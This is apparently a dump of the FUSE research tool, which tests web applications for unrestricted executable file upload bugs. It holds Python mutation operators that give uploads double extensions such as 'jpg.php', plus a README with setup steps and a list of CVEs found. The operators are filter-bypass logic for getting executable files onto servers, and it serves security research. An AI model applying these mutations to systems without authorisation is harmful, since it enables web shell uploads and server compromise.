'M06', 'M04_JPG', 'M04_GIF', 'M04_ZIP', 'M04_TAR_GZ', 'M04_PDF', 'M04_PHP3', 'M04_PHP4', 'M04_PHP5', 'M04_PHP7', 'M04_PHAR', 'M04_PHT', 'M04_PHTML', 'M04_PNG', 'M04_TXT', 'M07_OTHER','M08'] # ([classname])when this op used for mutation, 8 | 9 | # operations in this list can be used to extra mutation. 
10 | __resource__ = {} # ({type:resource filename}) 11 | __seed_dependency__ = __exclusion_op__.keys()#["html","js"] # seed file dependency for operation 12 | 13 | def operation(self, output, seed_file, resource_file=None): 14 | if output['filename'] != None and len(output['filename']) > 0: 15 | filename = output['filename'] 16 | else: 17 | filename = utils.extract_filename(seed_file) 18 | #change = lambda a : chr(ord(a)+1) 19 | output['filename'] = filename + '_M10' 20 | #output['fileext'] = ''.join(map(change,list(output['fileext']))) 21 | output['fileext'] = 'fuse' 22 | -------------------------------------------------------------------------------- /mutation_op/m12_jpg.py: -------------------------------------------------------------------------------- 1 | from mutation_op import * 2 | import utils 3 | 4 | class mOP(MutationOP): 5 | __comment__ = "Mutation12: Double extension" 6 | __mutate_type__ = "file" # (file|request) ; type of target 7 | __exclusion_op__ = {'php':['M07', 'M10', 'M12_ACE', 'M12_ARC', 'M12_ARJ', 'M12_BZ2', 'M12_DFXP', 'M12_EPUB', 'M12_GIF', 'M12_GPX', 'M12_GZIP', 'M12_JPG', 'M12_M4V', 'M12_MPA', 'M12_MPP', 'M12_NUMBERS', 'M12_ONETOC', 'M12_OXPS', 'M12_PAGES', 'M12_PDF', 'M12_PNG', 'M12_TAR_GZ', 'M12_TXT', 'M12_WP', 'M12_WRI', 'M12_XHT', 'M12_XLA', 'M12_XLW', 'M12_XPS', 'M12_ZIP', 'M12_HTML','M12_XHTML','M12_ZIPX'], 'js':['M12_ACE', 'M12_ARC', 'M12_ARJ', 'M12_BZ2', 'M12_DFXP', 'M12_EPUB', 'M12_GIF', 'M12_GPX', 'M12_GZIP', 'M12_JPG', 'M12_M4V', 'M12_MPA', 'M12_MPP', 'M12_NUMBERS', 'M12_ONETOC', 'M12_OXPS', 'M12_PAGES', 'M12_PDF', 'M12_PNG', 'M12_TAR_GZ', 'M12_TXT', 'M12_WP', 'M12_WRI', 'M12_XHT', 'M12_XLA', 'M12_XLW', 'M12_XPS', 'M12_ZIP', 'M12_HTML','M12_XHTML','M12_ZIPX'], 'html':['M04_ACE', 'M04_ARC', 'M04_ARJ', 'M04_BZ2', 'M04_DFXP', 'M04_EPUB', 'M04_GIF', 'M04_GPX', 'M04_GZIP', 'M04_JPG', 'M04_M4V', 'M04_MPA', 'M04_MPP', 'M04_NUMBERS', 'M04_ONETOC', 'M04_OXPS', 'M04_PAGES', 'M04_PDF', 'M04_PHAR', 'M04_PHP3', 'M04_PHP4', 'M04_PHP5', 
'M04_PHP7', 'M04_PHTML', 'M04_PHT', 'M04_PNG', 'M04_TAR_GZ', 'M04_TXT', 'M04_WP', 'M04_WRI', 'M04_XHT', 'M04_XLA', 'M04_XLW', 'M04_XPS', 'M04_ZIP', 'M04_ZIPX', 'M06', 'M10', 'M07', 'M12_ACE', 'M12_ARC', 'M12_ARJ', 'M12_BZ2', 'M12_DFXP', 'M12_EPUB', 'M12_GIF', 'M12_GPX', 'M12_GZIP', 'M12_JPG', 'M12_M4V', 'M12_MPA', 'M12_MPP', 'M12_NUMBERS', 'M12_ONETOC', 'M12_OXPS', 'M12_PAGES', 'M12_PDF', 'M12_PNG', 'M12_TAR_GZ', 'M12_TXT', 'M12_WP', 'M12_WRI', 'M12_XHT', 'M12_XLA', 'M12_XLW', 'M12_XPS', 'M12_ZIP', 'M12_HTML','M12_XHTML','M12_ZIPX'],'xhtml':['M04_ACE', 'M04_ARC', 'M04_ARJ', 'M04_BZ2', 'M04_DFXP', 'M04_EPUB', 'M04_GIF', 'M04_GPX', 'M04_GZIP', 'M04_JPG', 'M04_M4V', 'M04_MPA', 'M04_MPP', 'M04_NUMBERS', 'M04_ONETOC', 'M04_OXPS', 'M04_PAGES', 'M04_PDF', 'M04_PHAR', 'M04_PHP3', 'M04_PHP4', 'M04_PHP5', 'M04_PHP7', 'M04_PHTML', 'M04_PHT', 'M04_PNG', 'M04_TAR_GZ', 'M04_TXT', 'M04_WP', 'M04_WRI', 'M04_XHT', 'M04_XLA', 'M04_XLW', 'M04_XPS', 'M04_ZIP', 'M04_ZIPX', 'M06', 'M10', 'M07', 'M12_ACE', 'M12_ARC', 'M12_ARJ', 'M12_BZ2', 'M12_DFXP', 'M12_EPUB', 'M12_GIF', 'M12_GPX', 'M12_GZIP', 'M12_JPG', 'M12_M4V', 'M12_MPA', 'M12_MPP', 'M12_NUMBERS', 'M12_ONETOC', 'M12_OXPS', 'M12_PAGES', 'M12_PDF', 'M12_PNG', 'M12_TAR_GZ', 'M12_TXT', 'M12_WP', 'M12_WRI', 'M12_XHT', 'M12_XLA', 'M12_XLW', 'M12_XPS', 'M12_ZIP', 'M12_HTML','M12_XHTML','M12_ZIPX']}#[ 'M12_GIF','M12_TXT','M12_PNG','M12_PDF','M12_ZIP','M12_TAR_GZ', 'M10', 'M07_PHP', 'M07_OTHER', 'M04_JPG', 'M04_PNG', 'M04_GIF', 'M04_ZIP', 'M04_TAR_GZ', 'M04_PDF', 'M04_PHP3', 'M04_PHP4', 'M04_PHP5', 'M04_PHP7', 'M04_PHAR', 'M04_PHT', 'M04_PHTML', 'M04_TXT']# ([classname])when this op used for mutation, 8 | # operations in this list can be used to extra mutation. 
9 | __resource__ = {} # ({type:resource filename}) 10 | __seed_dependency__ = __exclusion_op__.keys()#["html","js","php"] # seed file dependency for operation 11 | 12 | def operation(self, output, seed_file, resource_file=None): 13 | if output['filename'] != None and len(output['filename']) > 0: 14 | filename = output['filename'] 15 | else: 16 | filename = utils.extract_filename(seed_file) 17 | 18 | output['filename'] = filename + '_M12JPG' 19 | 20 | output['fileext'] = 'jpg.'+output['fileext'] 21 | -------------------------------------------------------------------------------- /mutation_op/m12_pdf.py: -------------------------------------------------------------------------------- 1 | from mutation_op import * 2 | import utils 3 | 4 | class mOP(MutationOP): 5 | __comment__ = "Mutation12: Double extension" 6 | __mutate_type__ = "file" # (file|request) ; type of target 7 | __exclusion_op__ = {'php':['M07', 'M10', 'M12_ACE', 'M12_ARC', 'M12_ARJ', 'M12_BZ2', 'M12_DFXP', 'M12_EPUB', 'M12_GIF', 'M12_GPX', 'M12_GZIP', 'M12_JPG', 'M12_M4V', 'M12_MPA', 'M12_MPP', 'M12_NUMBERS', 'M12_ONETOC', 'M12_OXPS', 'M12_PAGES', 'M12_PDF', 'M12_PNG', 'M12_TAR_GZ', 'M12_TXT', 'M12_WP', 'M12_WRI', 'M12_XHT', 'M12_XLA', 'M12_XLW', 'M12_XPS', 'M12_ZIP', 'M12_HTML','M12_XHTML','M12_ZIPX'], 'js':['M12_ACE', 'M12_ARC', 'M12_ARJ', 'M12_BZ2', 'M12_DFXP', 'M12_EPUB', 'M12_GIF', 'M12_GPX', 'M12_GZIP', 'M12_JPG', 'M12_M4V', 'M12_MPA', 'M12_MPP', 'M12_NUMBERS', 'M12_ONETOC', 'M12_OXPS', 'M12_PAGES', 'M12_PDF', 'M12_PNG', 'M12_TAR_GZ', 'M12_TXT', 'M12_WP', 'M12_WRI', 'M12_XHT', 'M12_XLA', 'M12_XLW', 'M12_XPS', 'M12_ZIP', 'M12_HTML','M12_XHTML','M12_ZIPX'], 'html':['M04_ACE', 'M04_ARC', 'M04_ARJ', 'M04_BZ2', 'M04_DFXP', 'M04_EPUB', 'M04_GIF', 'M04_GPX', 'M04_GZIP', 'M04_JPG', 'M04_M4V', 'M04_MPA', 'M04_MPP', 'M04_NUMBERS', 'M04_ONETOC', 'M04_OXPS', 'M04_PAGES', 'M04_PDF', 'M04_PHAR', 'M04_PHP3', 'M04_PHP4', 'M04_PHP5', 'M04_PHP7', 'M04_PHTML', 'M04_PHT', 'M04_PNG', 'M04_TAR_GZ', 'M04_TXT', 'M04_WP', 
'M04_WRI', 'M04_XHT', 'M04_XLA', 'M04_XLW', 'M04_XPS', 'M04_ZIP', 'M04_ZIPX', 'M06', 'M10', 'M07', 'M12_ACE', 'M12_ARC', 'M12_ARJ', 'M12_BZ2', 'M12_DFXP', 'M12_EPUB', 'M12_GIF', 'M12_GPX', 'M12_GZIP', 'M12_JPG', 'M12_M4V', 'M12_MPA', 'M12_MPP', 'M12_NUMBERS', 'M12_ONETOC', 'M12_OXPS', 'M12_PAGES', 'M12_PDF', 'M12_PNG', 'M12_TAR_GZ', 'M12_TXT', 'M12_WP', 'M12_WRI', 'M12_XHT', 'M12_XLA', 'M12_XLW', 'M12_XPS', 'M12_ZIP', 'M12_HTML','M12_XHTML','M12_ZIPX'],'xhtml':['M04_ACE', 'M04_ARC', 'M04_ARJ', 'M04_BZ2', 'M04_DFXP', 'M04_EPUB', 'M04_GIF', 'M04_GPX', 'M04_GZIP', 'M04_JPG', 'M04_M4V', 'M04_MPA', 'M04_MPP', 'M04_NUMBERS', 'M04_ONETOC', 'M04_OXPS', 'M04_PAGES', 'M04_PDF', 'M04_PHAR', 'M04_PHP3', 'M04_PHP4', 'M04_PHP5', 'M04_PHP7', 'M04_PHTML', 'M04_PHT', 'M04_PNG', 'M04_TAR_GZ', 'M04_TXT', 'M04_WP', 'M04_WRI', 'M04_XHT', 'M04_XLA', 'M04_XLW', 'M04_XPS', 'M04_ZIP', 'M04_ZIPX', 'M06', 'M10', 'M07', 'M12_ACE', 'M12_ARC', 'M12_ARJ', 'M12_BZ2', 'M12_DFXP', 'M12_EPUB', 'M12_GIF', 'M12_GPX', 'M12_GZIP', 'M12_JPG', 'M12_M4V', 'M12_MPA', 'M12_MPP', 'M12_NUMBERS', 'M12_ONETOC', 'M12_OXPS', 'M12_PAGES', 'M12_PDF', 'M12_PNG', 'M12_TAR_GZ', 'M12_TXT', 'M12_WP', 'M12_WRI', 'M12_XHT', 'M12_XLA', 'M12_XLW', 'M12_XPS', 'M12_ZIP', 'M12_HTML','M12_XHTML','M12_ZIPX']}#['M12_JPG','M12_GIF','M12_TXT','M12_PNG', 'M12_ZIP','M12_TAR_GZ', 'M10', 'M07_PHP', 'M07_OTHER', 'M04_JPG', 'M04_PNG', 'M04_GIF', 'M04_ZIP', 'M04_TAR_GZ', 'M04_PDF', 'M04_PHP3', 'M04_PHP4', 'M04_PHP5', 'M04_PHP7', 'M04_PHAR', 'M04_PHT', 'M04_PHTML', 'M04_TXT']# ([classname])when this op used for mutation, 8 | # operations in this list can be used to extra mutation. 
9 | __resource__ = {} # ({type:resource filename}) 10 | __seed_dependency__ = __exclusion_op__.keys()#["html","js","php"] # seed file dependency for operation 11 | 12 | def operation(self, output, seed_file, resource_file=None): 13 | if output['filename'] != None and len(output['filename']) > 0: 14 | filename = output['filename'] 15 | else: 16 | filename = utils.extract_filename(seed_file) 17 | 18 | output['filename'] = filename + '_M12PDF' 19 | 20 | output['fileext'] = 'pdf.'+output['fileext'] 21 | -------------------------------------------------------------------------------- /mutation_op/m12_png.py: -------------------------------------------------------------------------------- 1 | from mutation_op import * 2 | import utils 3 | 4 | class mOP(MutationOP): 5 | __comment__ = "Mutation12: Double extension" 6 | __mutate_type__ = "file" # (file|request) ; type of target 7 | __exclusion_op__ = {'php':['M07', 'M10', 'M12_ACE', 'M12_ARC', 'M12_ARJ', 'M12_BZ2', 'M12_DFXP', 'M12_EPUB', 'M12_GIF', 'M12_GPX', 'M12_GZIP', 'M12_JPG', 'M12_M4V', 'M12_MPA', 'M12_MPP', 'M12_NUMBERS', 'M12_ONETOC', 'M12_OXPS', 'M12_PAGES', 'M12_PDF', 'M12_PNG', 'M12_TAR_GZ', 'M12_TXT', 'M12_WP', 'M12_WRI', 'M12_XHT', 'M12_XLA', 'M12_XLW', 'M12_XPS', 'M12_ZIP', 'M12_HTML','M12_XHTML','M12_ZIPX'], 'js':['M12_ACE', 'M12_ARC', 'M12_ARJ', 'M12_BZ2', 'M12_DFXP', 'M12_EPUB', 'M12_GIF', 'M12_GPX', 'M12_GZIP', 'M12_JPG', 'M12_M4V', 'M12_MPA', 'M12_MPP', 'M12_NUMBERS', 'M12_ONETOC', 'M12_OXPS', 'M12_PAGES', 'M12_PDF', 'M12_PNG', 'M12_TAR_GZ', 'M12_TXT', 'M12_WP', 'M12_WRI', 'M12_XHT', 'M12_XLA', 'M12_XLW', 'M12_XPS', 'M12_ZIP', 'M12_HTML','M12_XHTML','M12_ZIPX'], 'html':['M04_ACE', 'M04_ARC', 'M04_ARJ', 'M04_BZ2', 'M04_DFXP', 'M04_EPUB', 'M04_GIF', 'M04_GPX', 'M04_GZIP', 'M04_JPG', 'M04_M4V', 'M04_MPA', 'M04_MPP', 'M04_NUMBERS', 'M04_ONETOC', 'M04_OXPS', 'M04_PAGES', 'M04_PDF', 'M04_PHAR', 'M04_PHP3', 'M04_PHP4', 'M04_PHP5', 'M04_PHP7', 'M04_PHTML', 'M04_PHT', 'M04_PNG', 'M04_TAR_GZ', 'M04_TXT', 'M04_WP', 
'M04_WRI', 'M04_XHT', 'M04_XLA', 'M04_XLW', 'M04_XPS', 'M04_ZIP', 'M04_ZIPX', 'M06', 'M10', 'M07', 'M12_ACE', 'M12_ARC', 'M12_ARJ', 'M12_BZ2', 'M12_DFXP', 'M12_EPUB', 'M12_GIF', 'M12_GPX', 'M12_GZIP', 'M12_JPG', 'M12_M4V', 'M12_MPA', 'M12_MPP', 'M12_NUMBERS', 'M12_ONETOC', 'M12_OXPS', 'M12_PAGES', 'M12_PDF', 'M12_PNG', 'M12_TAR_GZ', 'M12_TXT', 'M12_WP', 'M12_WRI', 'M12_XHT', 'M12_XLA', 'M12_XLW', 'M12_XPS', 'M12_ZIP', 'M12_HTML','M12_XHTML','M12_ZIPX'],'xhtml':['M04_ACE', 'M04_ARC', 'M04_ARJ', 'M04_BZ2', 'M04_DFXP', 'M04_EPUB', 'M04_GIF', 'M04_GPX', 'M04_GZIP', 'M04_JPG', 'M04_M4V', 'M04_MPA', 'M04_MPP', 'M04_NUMBERS', 'M04_ONETOC', 'M04_OXPS', 'M04_PAGES', 'M04_PDF', 'M04_PHAR', 'M04_PHP3', 'M04_PHP4', 'M04_PHP5', 'M04_PHP7', 'M04_PHTML', 'M04_PHT', 'M04_PNG', 'M04_TAR_GZ', 'M04_TXT', 'M04_WP', 'M04_WRI', 'M04_XHT', 'M04_XLA', 'M04_XLW', 'M04_XPS', 'M04_ZIP', 'M04_ZIPX', 'M06', 'M10', 'M07', 'M12_ACE', 'M12_ARC', 'M12_ARJ', 'M12_BZ2', 'M12_DFXP', 'M12_EPUB', 'M12_GIF', 'M12_GPX', 'M12_GZIP', 'M12_JPG', 'M12_M4V', 'M12_MPA', 'M12_MPP', 'M12_NUMBERS', 'M12_ONETOC', 'M12_OXPS', 'M12_PAGES', 'M12_PDF', 'M12_PNG', 'M12_TAR_GZ', 'M12_TXT', 'M12_WP', 'M12_WRI', 'M12_XHT', 'M12_XLA', 'M12_XLW', 'M12_XPS', 'M12_ZIP', 'M12_HTML','M12_XHTML','M12_ZIPX']}#['M12_JPG','M12_GIF','M12_TXT', 'M12_PDF','M12_ZIP','M12_TAR_GZ', 'M10', 'M07_PHP', 'M07_OTHER', 'M04_JPG', 'M04_PNG', 'M04_GIF', 'M04_ZIP', 'M04_TAR_GZ', 'M04_PDF', 'M04_PHP3', 'M04_PHP4', 'M04_PHP5', 'M04_PHP7', 'M04_PHAR', 'M04_PHT', 'M04_PHTML', 'M04_TXT'] # ([classname])when this op used for mutation, 8 | # operations in this list can be used to extra mutation. 
9 | __resource__ = {} # ({type:resource filename}) 10 | __seed_dependency__ = __exclusion_op__.keys()#["html","js","php"] # seed file dependency for operation 11 | 12 | def operation(self, output, seed_file, resource_file=None): 13 | if output['filename'] != None and len(output['filename']) > 0: 14 | filename = output['filename'] 15 | else: 16 | filename = utils.extract_filename(seed_file) 17 | 18 | output['filename'] = filename + '_M12PNG' 19 | 20 | output['fileext'] = 'png.'+output['fileext'] 21 | -------------------------------------------------------------------------------- /mutation_op/m12_tar_gz.py: -------------------------------------------------------------------------------- 1 | from mutation_op import * 2 | import utils 3 | 4 | class mOP(MutationOP): 5 | __comment__ = "Mutation12: Double extension" 6 | __mutate_type__ = "file" # (file|request) ; type of target 7 | __exclusion_op__ = {'php':['M04_BZ2', 'M07', 'M10', 'M12_ACE', 'M12_ARC', 'M12_ARJ', 'M12_BZ2', 'M12_DFXP', 'M12_EPUB', 'M12_GIF', 'M12_GPX', 'M12_GZIP', 'M12_JPG', 'M12_M4V', 'M12_MPA', 'M12_MPP', 'M12_NUMBERS', 'M12_ONETOC', 'M12_OXPS', 'M12_PAGES', 'M12_PDF', 'M12_PNG', 'M12_TAR_GZ', 'M12_TXT', 'M12_WP', 'M12_WRI', 'M12_XHT', 'M12_XLA', 'M12_XLW', 'M12_XPS', 'M12_ZIP', 'M12_HTML','M12_XHTML','M12_ZIPX'], 'js':['M04_BZ2', 'M04_GIF', 'M04_JPG', 'M04_PNG', 'M12_ACE', 'M12_ARC', 'M12_ARJ', 'M12_BZ2', 'M12_DFXP', 'M12_EPUB', 'M12_GIF', 'M12_GPX', 'M12_GZIP', 'M12_JPG', 'M12_M4V', 'M12_MPA', 'M12_MPP', 'M12_NUMBERS', 'M12_ONETOC', 'M12_OXPS', 'M12_PAGES', 'M12_PDF', 'M12_PNG', 'M12_TAR_GZ', 'M12_TXT', 'M12_WP', 'M12_WRI', 'M12_XHT', 'M12_XLA', 'M12_XLW', 'M12_XPS', 'M12_ZIP', 'M12_HTML','M12_XHTML','M12_ZIPX'], 'html':['M04_ACE', 'M04_ARC', 'M04_ARJ', 'M04_BZ2', 'M04_DFXP', 'M04_EPUB', 'M04_GIF', 'M04_GPX', 'M04_GZIP', 'M04_JPG', 'M04_M4V', 'M04_MPA', 'M04_MPP', 'M04_NUMBERS', 'M04_ONETOC', 'M04_OXPS', 'M04_PAGES', 'M04_PDF', 'M04_PHAR', 'M04_PHP3', 'M04_PHP4', 'M04_PHP5', 'M04_PHP7', 
'M04_PHTML', 'M04_PHT', 'M04_PNG', 'M04_TAR_GZ', 'M04_TXT', 'M04_WP', 'M04_WRI', 'M04_XHT', 'M04_XLA', 'M04_XLW', 'M04_XPS', 'M04_ZIP', 'M04_ZIPX', 'M06', 'M10', 'M07', 'M12_ACE', 'M12_ARC', 'M12_ARJ', 'M12_BZ2', 'M12_DFXP', 'M12_EPUB', 'M12_GIF', 'M12_GPX', 'M12_GZIP', 'M12_JPG', 'M12_M4V', 'M12_MPA', 'M12_MPP', 'M12_NUMBERS', 'M12_ONETOC', 'M12_OXPS', 'M12_PAGES', 'M12_PDF', 'M12_PNG', 'M12_TAR_GZ', 'M12_TXT', 'M12_WP', 'M12_WRI', 'M12_XHT', 'M12_XLA', 'M12_XLW', 'M12_XPS', 'M12_ZIP', 'M12_HTML','M12_XHTML','M12_ZIPX'],'xhtml':['M08', 'M04_ACE', 'M04_ARC', 'M04_ARJ', 'M04_BZ2', 'M04_DFXP', 'M04_EPUB', 'M04_GIF', 'M04_GPX', 'M04_GZIP', 'M04_JPG', 'M04_M4V', 'M04_MPA', 'M04_MPP', 'M04_NUMBERS', 'M04_ONETOC', 'M04_OXPS', 'M04_PAGES', 'M04_PDF', 'M04_PHAR', 'M04_PHP3', 'M04_PHP4', 'M04_PHP5', 'M04_PHP7', 'M04_PHTML', 'M04_PHT', 'M04_PNG', 'M04_TAR_GZ', 'M04_TXT', 'M04_WP', 'M04_WRI', 'M04_XHT', 'M04_XLA', 'M04_XLW', 'M04_XPS', 'M04_ZIP', 'M04_ZIPX', 'M06', 'M10', 'M07', 'M12_ACE', 'M12_ARC', 'M12_ARJ', 'M12_BZ2', 'M12_DFXP', 'M12_EPUB', 'M12_GIF', 'M12_GPX', 'M12_GZIP', 'M12_JPG', 'M12_M4V', 'M12_MPA', 'M12_MPP', 'M12_NUMBERS', 'M12_ONETOC', 'M12_OXPS', 'M12_PAGES', 'M12_PDF', 'M12_PNG', 'M12_TAR_GZ', 'M12_TXT', 'M12_WP', 'M12_WRI', 'M12_XHT', 'M12_XLA', 'M12_XLW', 'M12_XPS', 'M12_ZIP', 'M12_HTML','M12_XHTML','M12_ZIPX']}# ['M12_JPG','M12_GIF','M12_TXT','M12_PNG','M12_PDF','M12_ZIP' , 'M10', 'M07_PHP', 'M07_OTHER', 'M04_JPG', 'M04_PNG', 'M04_GIF', 'M04_ZIP', 'M04_TAR_GZ', 'M04_PDF', 'M04_PHP3', 'M04_PHP4', 'M04_PHP5', 'M04_PHP7', 'M04_PHAR', 'M04_PHT', 'M04_PHTML', 'M04_TXT'] # ([classname])when this op used for mutation, 8 | # operations in this list can be used to extra mutation. 
9 | __resource__ = {} # ({type:resource filename}) 10 | __seed_dependency__ = __exclusion_op__.keys()#["html","js","php"] # seed file dependency for operation 11 | 12 | def operation(self, output, seed_file, resource_file=None): 13 | if output['filename'] != None and len(output['filename']) > 0: 14 | filename = output['filename'] 15 | else: 16 | filename = utils.extract_filename(seed_file) 17 | 18 | output['filename'] = filename + '_M12TARGZ' 19 | 20 | output['fileext'] = 'tar.gz.'+output['fileext'] 21 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # FUSE 2 | 3 | FUSE is a penetration testing system designed to identify Unrestricted 4 | Executable File Upload (UEFU) vulnerabilities. The details of the testing 5 | strategy is in our 6 | [paper](https://wsp-lab.github.io/papers/lee-fuse-ndss20.pdf), 7 | "FUSE: Finding File Upload Bugs via Penetration Testing", which appeared in 8 | NDSS 2020. To see how to configure and execute FUSE, see the followings. 9 | 10 | # Setup 11 | ## Install 12 | 13 | FUSE currently works on Ubuntu 18.04 and Python 2.7.15. 14 | 15 | 1. Install dependencies 16 | ``` 17 | # apt-get install rabbitmq-server 18 | # apt-get install python-pip 19 | # apt-get install git 20 | ``` 21 | 22 | 2. Clone and build FUSE 23 | ``` 24 | $ git clone https://github.com/WSP-LAB/FUSE 25 | $ cd FUSE && pip install -r requirements.txt 26 | ``` 27 | 28 | * If you plan to leverage headless browser verification using selenium, please 29 | install Chrome and Firefox web driver by refering [selenium 30 | document](https://selenium.dev/selenium/docs/api/py/index.html). 31 | 32 | ## Usage 33 | ### Configuration 34 | 35 | * FUSE uses a user-provided [configuration file](configs/default-credential.conf) 36 | that specifies parameters for a target PHP application. The script must be 37 | filled out before testing a target Web application. 
You can check out 38 | [README](configs/README.md) file and [example configuration files](configs). 39 | 40 | 41 | * Configuration for File Monitor (Optional) 42 | ``` 43 | $ vim filemonitor.py 44 | 45 | ... 46 | 10 MONITOR_PATH='/var/www/html/' <- Web root of the target application 47 | 11 MONITOR_PORT=20174 <- Default port of File Monitor 48 | 12 EVENT_LIST_LIMITATION=8000 <- Maximum number of elements in EVENT_LIST 49 | ... 50 | ``` 51 | 52 | 53 | ### Execution 54 | 55 | * FUSE 56 | 57 | ``` 58 | $ python framework.py [Path of configuration file] 59 | ``` 60 | 61 | * File Monitor 62 | 63 | ``` 64 | $ python filemonitor.py 65 | ``` 66 | 67 | * Result 68 | * When FUSE completes the penetration testing, a [HOST] directory and a [HOST_report.txt] file are created. 69 | * A [HOST] folder stores the files that FUSE attempted to upload. 70 | * A [HOST_report.txt] file contains test results and information related to files that trigger U(E)FU. 71 | 72 | # CVEs 73 | If you find UFU and UEFU bugs and get CVEs by running FUSE, please send a PR for [README.md](README.md) 74 | 75 | Application | CVEs 76 | ------------| ---- 77 | Elgg | CVE-2018-19172 78 | ECCube3 | CVE-2018-18637 79 | CMSMadeSimple | CVE-2018-19419, CVE-2018-18574 80 | CMSimple | CVE-2018-19062 81 | Concrete5 | CVE-2018-19146 82 | GetSimpleCMS | CVE-2018-19420, CVE-2018-19421 83 | Subrion | CVE-2018-19422 84 | OsCommerce2 | CVE-2018-18572, CVE-2018-18964, CVE-2018-18965, CVE-2018-18966 85 | Monstra | CVE-2018-6383, CVE-2018-18694 86 | XE | XEVE-2019-001 87 | 88 | 89 | # Author 90 | This research project has been conducted by [WSP Lab](https://wsp-lab.github.io) at KAIST. 
91 | 92 | * Taekjin Lee 93 | * [Seongil Wi](https://seongil-wi.github.io/) 94 | * [Suyoung Lee](https://leeswimming.com/) 95 | * [Sooel Son](https://sites.google.com/site/ssonkaist/home) 96 | 97 | # Citing FUSE 98 | To cite our paper: 99 | ``` 100 | @INPROCEEDINGS{lee:ndss:2020, 101 | author = {Taekjin Lee and Seongil Wi and Suyoung Lee and Sooel Son}, 102 | title = {{FUSE}: Finding File Upload Bugs via Penetration Testing}, 103 | booktitle = {Proceedings of the Network and Distributed System Security Symposium}, 104 | year = 2020 105 | } 106 | ``` 107 | 108 | 109 | -------------------------------------------------------------------------------- /mutation_op/m12_gif.py: -------------------------------------------------------------------------------- 1 | from mutation_op import * 2 | import utils 3 | 4 | class mOP(MutationOP): 5 | __comment__ = "Mutation12: Double extension" 6 | __mutate_type__ = "file" # (file|request) ; type of target 7 | __exclusion_op__ = {'php':['M04_GIF','M07', 'M10', 'M12_ACE', 'M12_ARC', 'M12_ARJ', 'M12_BZ2', 'M12_DFXP', 'M12_EPUB', 'M12_GIF', 'M12_GPX', 'M12_GZIP', 'M12_JPG', 'M12_M4V', 'M12_MPA', 'M12_MPP', 'M12_NUMBERS', 'M12_ONETOC', 'M12_OXPS', 'M12_PAGES', 'M12_PDF', 'M12_PNG', 'M12_TAR_GZ', 'M12_TXT', 'M12_WP', 'M12_WRI', 'M12_XHT', 'M12_XLA', 'M12_XLW', 'M12_XPS', 'M12_ZIP', 'M12_HTML','M12_XHTML','M12_ZIPX'], 'js':['M04_GIF','M04_ACE','M04_ARC','M04_ARJ','M04_DFXP','M04_EPUB','M04_GIF','M04_GPX','M04_GZIP','M04_JPG','M04_M4V','M04_MPA','M04_MPP','M04_NUMBERS','M04_ONETOC','M04_OXPS','M04_PAGES','M04_PNG','M04_WP','M04_WRI','M04_XLA','M04_XLW','M04_XPS','M04_ZIPX','M7','M12_ACE', 'M12_ARC', 'M12_ARJ', 'M12_BZ2', 'M12_DFXP', 'M12_EPUB', 'M12_GIF', 'M12_GPX', 'M12_GZIP', 'M12_JPG', 'M12_M4V', 'M12_MPA', 'M12_MPP', 'M12_NUMBERS', 'M12_ONETOC', 'M12_OXPS', 'M12_PAGES', 'M12_PDF', 'M12_PNG', 'M12_TAR_GZ', 'M12_TXT', 'M12_WP', 'M12_WRI', 'M12_XHT', 'M12_XLA', 'M12_XLW', 'M12_XPS', 'M12_ZIP', 'M12_HTML','M12_XHTML','M12_ZIPX'], 
'html':['M04_ACE', 'M04_ARC', 'M04_ARJ', 'M04_BZ2', 'M04_DFXP', 'M04_EPUB', 'M04_GIF', 'M04_GPX', 'M04_GZIP', 'M04_JPG', 'M04_M4V', 'M04_MPA', 'M04_MPP', 'M04_NUMBERS', 'M04_ONETOC', 'M04_OXPS', 'M04_PAGES', 'M04_PDF', 'M04_PHAR', 'M04_PHP3', 'M04_PHP4', 'M04_PHP5', 'M04_PHP7', 'M04_PHTML', 'M04_PHT', 'M04_PNG', 'M04_TAR_GZ', 'M04_TXT', 'M04_WP', 'M04_WRI', 'M04_XHT', 'M04_XLA', 'M04_XLW', 'M04_XPS', 'M04_ZIP', 'M04_ZIPX', 'M06', 'M10', 'M07', 'M12_ACE', 'M12_ARC', 'M12_ARJ', 'M12_BZ2', 'M12_DFXP', 'M12_EPUB', 'M12_GIF', 'M12_GPX', 'M12_GZIP', 'M12_JPG', 'M12_M4V', 'M12_MPA', 'M12_MPP', 'M12_NUMBERS', 'M12_ONETOC', 'M12_OXPS', 'M12_PAGES', 'M12_PDF', 'M12_PNG', 'M12_TAR_GZ', 'M12_TXT', 'M12_WP', 'M12_WRI', 'M12_XHT', 'M12_XLA', 'M12_XLW', 'M12_XPS', 'M12_ZIP', 'M12_HTML','M12_XHTML','M12_ZIPX'],'xhtml':['M04_ACE', 'M04_ARC', 'M04_ARJ', 'M04_BZ2', 'M04_DFXP', 'M04_EPUB', 'M04_GIF', 'M04_GPX', 'M04_GZIP', 'M04_JPG', 'M04_M4V', 'M04_MPA', 'M04_MPP', 'M04_NUMBERS', 'M04_ONETOC', 'M04_OXPS', 'M04_PAGES', 'M04_PDF', 'M04_PHAR', 'M04_PHP3', 'M04_PHP4', 'M04_PHP5', 'M04_PHP7', 'M04_PHTML', 'M04_PHT', 'M04_PNG', 'M04_TAR_GZ', 'M04_TXT', 'M04_WP', 'M04_WRI', 'M04_XHT', 'M04_XLA', 'M04_XLW', 'M04_XPS', 'M04_ZIP', 'M04_ZIPX', 'M06', 'M10', 'M07', 'M12_ACE', 'M12_ARC', 'M12_ARJ', 'M12_BZ2', 'M12_DFXP', 'M12_EPUB', 'M12_GIF', 'M12_GPX', 'M12_GZIP', 'M12_JPG', 'M12_M4V', 'M12_MPA', 'M12_MPP', 'M12_NUMBERS', 'M12_ONETOC', 'M12_OXPS', 'M12_PAGES', 'M12_PDF', 'M12_PNG', 'M12_TAR_GZ', 'M12_TXT', 'M12_WP', 'M12_WRI', 'M12_XHT', 'M12_XLA', 'M12_XLW', 'M12_XPS', 'M12_ZIP', 'M12_HTML','M12_XHTML','M12_ZIPX','M08']}#['M12_JPG', 'M12_TXT','M12_PNG','M12_PDF','M12_ZIP','M12_TAR_GZ', 'M10', 'M07_PHP', 'M07_OTHER', 'M04_JPG', 'M04_PNG', 'M04_GIF', 'M04_ZIP', 'M04_TAR_GZ', 'M04_PDF', 'M04_PHP3', 'M04_PHP4', 'M04_PHP5', 'M04_PHP7', 'M04_PHAR', 'M04_PHT', 'M04_PHTML', 'M04_TXT'] # ([classname])when this op used for mutation, 8 | # operations in this list can be used to extra mutation. 
